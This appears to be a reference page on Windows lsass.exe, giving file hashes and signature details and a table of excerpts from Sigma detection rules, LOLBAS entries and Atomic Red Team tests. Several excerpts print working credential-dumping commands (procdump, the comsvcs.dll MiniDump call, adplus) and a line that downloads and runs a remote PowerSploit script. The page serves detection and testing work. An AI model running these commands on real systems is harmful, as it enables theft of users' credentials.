lsass.exe

  • File Path: C:\Windows\system32\lsass.exe
  • Description: Local Security Authority Process

Hashes

Type Hash
MD5 5AE8589CDDE46ED132AEF8280BC8894A
SHA1 20A244C0440ED0B418F454F8A12ED0DE6A8BD6D2
SHA256 D957A03C6EA35CBF0C90B0B088DF07E7803A1A3EEB4BA889038F88DB066BBDC4
SHA384 A2A00CB7709B7E90EEA20781D3E156532D69265E7C1430C613A3ECA4AB214A556C484A6663C7494B97EBF678D14A761D
SHA512 E8949C6EF0D5DAC5A89536734305AEE0CD1F28055B77367981EB065CA967AA391FDC9C14C634DE5119D7719BCA36A10B2B079ADF9E705028F9C0A706F202F077
SSDEEP 768:xorvR2Fw+l+EPbRXFk5sM9cxTS3Pgez2F6zHoeTosKzls65ztMIrJ2fy1PTSi:xTFw+l+Azk55zV8eTY5JJGiJ2qPTSi

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: lsass.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.14393.2580 (rs1_release_inmarket.181009-1745)
  • Product Version: 10.0.14393.2580
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of lsass.exe being misused. While lsass.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma zeek_smb_converted_win_transferring_files_with_credential_data.yml - '\lsass' DRL 1.0
sigma win_lm_namedpipe.yml - 'lsass' DRL 1.0
sigma win_lsass_access_non_system_account.yml title: LSASS Access from Non System Account DRL 1.0
sigma win_lsass_access_non_system_account.yml description: Detects potential mimikatz-like tools accessing LSASS from non system account DRL 1.0
sigma win_lsass_access_non_system_account.yml ObjectName\|endswith: '\lsass.exe' DRL 1.0
sigma win_suspicious_outbound_kerberos_connection.yml - '\lsass.exe' DRL 1.0
sigma win_susp_lsass_dump.yml title: Password Dumper Activity on LSASS DRL 1.0
sigma win_susp_lsass_dump.yml description: Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN DRL 1.0
sigma win_susp_lsass_dump.yml ProcessName\|endswith: '\lsass.exe' DRL 1.0
sigma win_susp_lsass_dump_generic.yml title: Generic Password Dumper Activity on LSASS DRL 1.0
sigma win_susp_lsass_dump_generic.yml description: Detects process handle on LSASS process with certain access mask DRL 1.0
sigma win_susp_lsass_dump_generic.yml ObjectName\|endswith: '\lsass.exe' DRL 1.0
sigma win_susp_lsass_dump_generic.yml - Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it DRL 1.0
sigma win_transferring_files_with_credential_data_via_network_shares.yml - '\lsass' DRL 1.0
sigma win_alert_lsass_access.yml title: LSASS Access Detected via Attack Surface Reduction DRL 1.0
sigma win_alert_lsass_access.yml description: Detects Access to LSASS Process DRL 1.0
sigma win_alert_lsass_access.yml definition: 'Requirements:Enabled Block credential stealing from the Windows local security authority subsystem (lsass.exe) from Attack Surface Reduction (GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2)' DRL 1.0
sigma win_alert_lsass_access.yml Path\|endswith: '\lsass.exe' DRL 1.0
sigma sysmon_password_dumper_lsass.yml title: Password Dumper Remote Thread in LSASS DRL 1.0
sigma sysmon_password_dumper_lsass.yml description: Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events. DRL 1.0
sigma sysmon_password_dumper_lsass.yml TargetImage\|endswith: '\lsass.exe' DRL 1.0
sigma sysmon_mimikatz_detection_lsass.yml title: Mimikatz Detection LSASS Access DRL 1.0
sigma sysmon_mimikatz_detection_lsass.yml description: Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_ LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_ INFORMATION "only old DRL 1.0
sigma sysmon_mimikatz_detection_lsass.yml TargetImage\|endswith: '\lsass.exe' DRL 1.0
sigma sysmon_mimikatz_detection_lsass.yml - Some security products access LSASS in this way. DRL 1.0
sigma file_event_win_creation_system_file.yml - '\lsass.exe' DRL 1.0
sigma file_event_win_hack_dumpert.yml description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory DRL 1.0
sigma file_event_win_hktl_createminidump.yml description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine DRL 1.0
sigma file_event_win_hktl_createminidump.yml - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass DRL 1.0
sigma file_event_win_hktl_createminidump.yml TargetFilename\|endswith: '\lsass.dmp' DRL 1.0
sigma file_event_win_lsass_dump.yml title: LSASS Process Memory Dump Files DRL 1.0
sigma file_event_win_lsass_dump.yml description: Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials DRL 1.0
sigma file_event_win_lsass_dump.yml - https://www.google.com/search?q=procdump+lsass DRL 1.0
sigma file_event_win_lsass_dump.yml - https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf DRL 1.0
sigma file_event_win_lsass_dump.yml - '\lsass.dmp' DRL 1.0
sigma file_event_win_lsass_dump.yml - '\lsass.zip' DRL 1.0
sigma file_event_win_lsass_dump.yml - '\lsass.rar' DRL 1.0
sigma file_event_win_lsass_dump.yml - '\lsass' DRL 1.0
sigma file_event_win_lsass_memory_dump_file_creation.yml title: LSASS Memory Dump File Creation DRL 1.0
sigma file_event_win_lsass_memory_dump_file_creation.yml description: LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified DRL 1.0
sigma file_event_win_lsass_memory_dump_file_creation.yml TargetFilename\|contains: 'lsass' DRL 1.0
sigma file_event_win_lsass_memory_dump_file_creation.yml - Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator DRL 1.0
sigma file_event_win_lsass_memory_dump_file_creation.yml - Dumps of another process that contains lsass in its process name (substring) DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml description: Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes. Tools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. DRL 1.0
sigma image_load_tttracer_mod_load.yml description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. DRL 1.0
sigma image_load_unsigned_image_loaded_into_lsass.yml title: Unsigned Image Loaded Into LSASS Process DRL 1.0
sigma image_load_unsigned_image_loaded_into_lsass.yml description: Loading unsigned image (DLL, EXE) into LSASS process DRL 1.0
sigma image_load_unsigned_image_loaded_into_lsass.yml Image\|endswith: '\lsass.exe' DRL 1.0
sigma net_connection_win_suspicious_outbound_kerberos_connection.yml - '\lsass.exe' DRL 1.0
sigma posh_ps_suspicious_getprocess_lsass.yml title: PowerShell Get-Process LSASS in ScriptBlock DRL 1.0
sigma posh_ps_suspicious_getprocess_lsass.yml description: Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity DRL 1.0
sigma posh_ps_suspicious_getprocess_lsass.yml ScriptBlockText\|contains: 'Get-Process lsass' DRL 1.0
sigma proc_access_win_cred_dump_lsass_access.yml title: Credentials Dumping Tools Accessing LSASS Memory DRL 1.0
sigma proc_access_win_cred_dump_lsass_access.yml description: Detects process access LSASS memory which is typical for credentials dumping tools DRL 1.0
sigma proc_access_win_cred_dump_lsass_access.yml TargetImage\|endswith: '\lsass.exe' DRL 1.0
sigma proc_access_win_cred_dump_lsass_access.yml - Legitimate software accessing LSASS process for legitimate reason; please add more filters DRL 1.0
sigma proc_access_win_lazagne_cred_dump_lsass_access.yml description: Detects LSASS process access by LaZagne for credential dumping. DRL 1.0
sigma proc_access_win_lazagne_cred_dump_lsass_access.yml TargetImage\|endswith: '\lsass.exe' DRL 1.0
sigma proc_access_win_lsass_dump_comsvcs_dll.yml title: Lsass Memory Dump via Comsvcs DLL DRL 1.0
sigma proc_access_win_lsass_dump_comsvcs_dll.yml description: Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass. DRL 1.0
sigma proc_access_win_lsass_dump_comsvcs_dll.yml TargetImage\|endswith: '\lsass.exe' DRL 1.0
sigma proc_access_win_lsass_memdump.yml title: LSASS Memory Dump DRL 1.0
sigma proc_access_win_lsass_memdump.yml description: Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up. DRL 1.0
sigma proc_access_win_lsass_memdump.yml TargetImage\|endswith: '\lsass.exe' DRL 1.0
sigma proc_access_win_lsass_memdump_evasion.yml title: LSASS Access from White-Listed Processes DRL 1.0
sigma proc_access_win_lsass_memdump_evasion.yml description: Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference DRL 1.0
sigma proc_access_win_lsass_memdump_evasion.yml - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz DRL 1.0
sigma proc_access_win_lsass_memdump_evasion.yml TargetImage\|endswith: '\lsass.exe' DRL 1.0
sigma proc_access_win_lsass_memdump_evasion.yml - Unlikely, since these tools shouldn't access lsass.exe at all DRL 1.0
sigma proc_access_win_lsass_memdump_indicators.yml title: LSASS Memory Access by Tool Named Dump DRL 1.0
sigma proc_access_win_lsass_memdump_indicators.yml - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz DRL 1.0
sigma proc_access_win_lsass_memdump_indicators.yml TargetImage\|endswith: '\lsass.exe' DRL 1.0
sigma proc_access_win_lsass_memdump_indicators.yml - Rare programs that contain the word dump in their name and access lsass DRL 1.0
sigma proc_access_win_mimikatz_trough_winrm.yml description: Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe. DRL 1.0
sigma proc_access_win_mimikatz_trough_winrm.yml TargetImage\|endswith: '\lsass.exe' DRL 1.0
sigma proc_access_win_pypykatz_cred_dump_lsass_access.yml description: Detects LSASS process access by pypykatz for credential dumping. DRL 1.0
sigma proc_access_win_pypykatz_cred_dump_lsass_access.yml TargetImage\|endswith: '\lsass.exe' DRL 1.0
sigma proc_access_win_susp_proc_access_lsass.yml title: Suspicious GrantedAccess Flags on LSASS Access DRL 1.0
sigma proc_access_win_susp_proc_access_lsass.yml description: Detects process access to LSASS memory with suspicious access flags DRL 1.0
sigma proc_access_win_susp_proc_access_lsass.yml TargetImage\|endswith: '\lsass.exe' DRL 1.0
sigma proc_access_win_susp_proc_access_lsass.yml - 'C:\Windows\System32\lsass.exe' DRL 1.0
sigma proc_access_win_susp_proc_access_lsass.yml - Legitimate software accessing LSASS process for legitimate reason DRL 1.0
sigma proc_access_win_susp_proc_access_lsass_susp_source.yml title: LSASS Access from Program in Suspicious Folder DRL 1.0
sigma proc_access_win_susp_proc_access_lsass_susp_source.yml description: Detects process access to LSASS memory with suspicious access flags and from a suspicious folder DRL 1.0
sigma proc_access_win_susp_proc_access_lsass_susp_source.yml TargetImage\|endswith: '\lsass.exe' DRL 1.0
sigma proc_access_win_susp_proc_access_lsass_susp_source.yml - Legitimate software accessing LSASS process for legitimate reason DRL 1.0
sigma proc_creation_win_abusing_debug_privilege.yml - '\lsass.exe' DRL 1.0
sigma proc_creation_win_credential_access_via_password_filter.yml description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS DRL 1.0
sigma proc_creation_win_hack_dumpert.yml description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory DRL 1.0
sigma proc_creation_win_hktl_createminidump.yml description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine DRL 1.0
sigma proc_creation_win_hktl_createminidump.yml - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass DRL 1.0
sigma proc_creation_win_lsass_dump.yml title: LSASS Memory Dumping DRL 1.0
sigma proc_creation_win_lsass_dump.yml description: Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials. Identifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials. DRL 1.0
sigma proc_creation_win_lsass_dump.yml - 'lsass' DRL 1.0
sigma proc_creation_win_lsass_dump.yml CommandLine\|contains: 'lsass' DRL 1.0
sigma proc_creation_win_procdump_evasion.yml - 'lsass' DRL 1.0
sigma proc_creation_win_procdump_evasion.yml - 'copy lsass.exe_' # procdump default pattern e.g. lsass.exe_220111_085234.dmp DRL 1.0
sigma proc_creation_win_procdump_evasion.yml - 'move lsass.exe_' # procdump default pattern e.g. lsass.exe_220111_085234.dmp DRL 1.0
sigma proc_creation_win_proc_wrong_parent.yml - '\lsass.exe' DRL 1.0
sigma proc_creation_win_susp_lsass_clone.yml title: Suspicious LSASS Process Clone DRL 1.0
sigma proc_creation_win_susp_lsass_clone.yml description: Detects a suspicious LSASS process process clone that could be a sign of process dumping activity DRL 1.0
sigma proc_creation_win_susp_lsass_clone.yml Image\|endswith: '\Windows\System32\lsass.exe' DRL 1.0
sigma proc_creation_win_susp_lsass_clone.yml ParentImage\|endswith: '\Windows\System32\lsass.exe' DRL 1.0
sigma proc_creation_win_susp_powershell_getprocess_lsass.yml title: PowerShell Get-Process LSASS DRL 1.0
sigma proc_creation_win_susp_powershell_getprocess_lsass.yml description: Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity DRL 1.0
sigma proc_creation_win_susp_powershell_getprocess_lsass.yml - 'Get-Process lsass' DRL 1.0
sigma proc_creation_win_susp_procdump_lsass.yml title: Suspicious Use of Procdump on LSASS DRL 1.0
sigma proc_creation_win_susp_procdump_lsass.yml description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable. DRL 1.0
sigma proc_creation_win_susp_procdump_lsass.yml CommandLine\|contains: ' lsass' DRL 1.0
sigma proc_creation_win_susp_procdump_lsass.yml - Unlikely, because no one should dump an lsass process memory DRL 1.0
sigma proc_creation_win_susp_trolleyexpress_procdump.yml description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory DRL 1.0
sigma proc_creation_win_susp_trolleyexpress_procdump.yml # We assume that the lsass.exe process has a process ID that's between 700 and 999 and the dumper uses just the PID as parameter DRL 1.0
sigma proc_creation_win_system_exe_anomaly.yml - '\lsass.exe' DRL 1.0
sigma proc_creation_win_tttracer_mod_load.yml description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. DRL 1.0
sigma proc_creation_win_xordump.yml - ' -process lsass.exe ' DRL 1.0
sigma registry_event_add_local_hidden_user.yml Image\|endswith: 'lsass.exe' DRL 1.0
sigma registry_event_silentprocessexit.yml - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ DRL 1.0
sigma registry_event_silentprocessexit_lsass.yml title: SilentProcessExit Monitor Registrytion for LSASS DRL 1.0
sigma registry_event_silentprocessexit_lsass.yml description: Detects changes to the Registry in which a monitor program gets registered to dump process memory of the lsass.exe process memory DRL 1.0
sigma registry_event_silentprocessexit_lsass.yml - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ DRL 1.0
sigma registry_event_silentprocessexit_lsass.yml TargetObject\|contains: 'Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe' DRL 1.0
sigma registry_event_susp_lsass_dll_load.yml title: DLL Load via LSASS DRL 1.0
sigma registry_event_susp_lsass_dll_load.yml description: Detects a method to load DLL via LSASS process using an undocumented Registry key DRL 1.0
sigma sysmon_accessing_winapi_in_powershell_credentials_dumping.yml description: Detects Accessing to lsass.exe by Powershell DRL 1.0
sigma sysmon_accessing_winapi_in_powershell_credentials_dumping.yml TargetImage\|endswith: '\lsass.exe' DRL 1.0
LOLBAS comsvcs.yml Usecase: Dump Lsass.exe process memory to retrieve credentials.  
LOLBAS Adplus.yml - Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet  
LOLBAS Adplus.yml Description: Creates a memory dump of the lsass process  
LOLBAS Adplus.yml - Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/  
LOLBAS Sqldumper.yml Usecase: Dump LSASS.exe to Mimikatz compatible dump using PID.  
malware-ioc exchange_exploitation \|af421b1f5a08499e130d24f448f6d79f7c76af2b\|Win64/Riskware.LsassDumper.J \|LSASS dumper used by Tonto Team © ESET 2014-2018
malware-ioc famoussparrow \|76C430B55F180A85F4E1A1E40E4A2EA37DB97599\|Win64/Kryptik.BSQ\|Lsass dumper © ESET 2014-2018
malware-ioc nukesped_lazarus .lsass.dll``{:.highlight .language-cmhg} © ESET 2014-2018
atomic-red-team index.md - T1003.001 LSASS Memory MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #5: Dump LSASS.exe Memory using NanoDump [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #8: LSASS read with pypykatz [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #9: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #10: Create Mini Dump of LSASS.exe using ProcDump [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #12: Dump LSASS with .Net 5 createdump.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #13: Dump LSASS.exe using imported Microsoft DLLs [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - T1547.008 LSASS Driver CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Masquerading as Windows LSASS process [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1003.001 LSASS Memory MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #5: Dump LSASS.exe Memory using NanoDump [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #8: LSASS read with pypykatz [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #9: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #10: Create Mini Dump of LSASS.exe using ProcDump [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #12: Dump LSASS with .Net 5 createdump.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #13: Dump LSASS.exe using imported Microsoft DLLs [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1547.008 LSASS Driver CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Masquerading as Windows LSASS process [windows] MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | Shared Modules CONTRIBUTE A TEST | DLL Search Order Hijacking | Dylib Hijacking CONTRIBUTE A TEST | Deobfuscate/Decode Files or Information | LSASS Memory | System Checks | | Remote Data Staging CONTRIBUTE A TEST | | One-Way Communication CONTRIBUTE A TEST | | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | Image File Execution Options Injection | LSASS Driver CONTRIBUTE A TEST | Dynamic Linker Hijacking | SAML Tokens | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | LSASS Driver CONTRIBUTE A TEST | Local Accounts | Executable Installer File Permissions Weakness CONTRIBUTE A TEST | Steal Application Access Token CONTRIBUTE A TEST | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | Windows Command Shell | Default Accounts | Domain Trust Modification CONTRIBUTE A TEST | Disable Windows Event Logging | LSASS Memory | System Information Discovery | | Man-in-the-Middle CONTRIBUTE A TEST | | Multi-hop Proxy | Stored Data Manipulation CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Image File Execution Options Injection | LSASS Driver CONTRIBUTE A TEST | Execution Guardrails CONTRIBUTE A TEST | Password Spraying | | | | | Remote Access Software | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | LSASS Driver CONTRIBUTE A TEST | Local Accounts | Exploitation for Defense Evasion CONTRIBUTE A TEST | Private Keys | | | | | Standard Encoding | | MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md # T1003.001 - LSASS Memory MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md <blockquote>Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement using Use Alternate Authentication Material. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md * procdump -ma lsass.exe lsass_dump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #2 - Dump LSASS.exe Memory using ProcDump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #5 - Dump LSASS.exe Memory using NanoDump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #8 - LSASS read with pypykatz MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #9 - Dump LSASS.exe Memory using Out-Minidump.ps1 MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #10 - Create Mini Dump of LSASS.exe using ProcDump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #12 - Dump LSASS with .Net 5 createdump.exe MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md - Atomic Test #13 - Dump LSASS.exe using imported Microsoft DLLs MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #2 - Dump LSASS.exe Memory using ProcDump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md #{procdump_exe} -accepteula -ma lsass.exe #{output_file} MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #5 - Dump LSASS.exe Memory using NanoDump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md 2. Select lsass.exe: MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md If lsass.exe is not visible, select “Show processes from all users”. This will allow you to observe execution of lsass.exe MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md 3. Dump lsass.exe memory: MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Right-click on lsass.exe in Task Manager. Select “Create Dump File”. The following dialog will show you the path to the saved file. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md | input_file | Path of the Lsass dump | Path | %tmp%\lsass.DMP| MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ##### Description: Lsass dump must exist at specified location (#{input_file}) MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Write-Host “Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)” MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #8 - LSASS read with pypykatz MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Parses secrets hidden in the LSASS process with python. Similar to mimikatz’s sekurlsa:: MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #9 - Dump LSASS.exe Memory using Out-Minidump.ps1 MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1’); get-process lsass | Out-Minidump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #10 - Create Mini Dump of LSASS.exe using ProcDump MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md #{procdump_exe} -accepteula -mm lsass.exe #{output_file} MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #12 - Dump LSASS with .Net 5 createdump.exe MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md (https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md | output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\dotnet-lsass.dmp| MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md $LSASS = tasklist | findstr “lsass” MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md $FIELDS = $LSASS -split “\s+” MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ## Atomic Test #13 - Dump LSASS.exe using imported Microsoft DLLs MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md | output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass-xordump.t1003.001.dmp| MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md - Atomic Test #1 - Masquerading as Windows LSASS process MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md ## Atomic Test #1 - Masquerading as Windows LSASS process MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe MIT License. © 2018 Red Canary
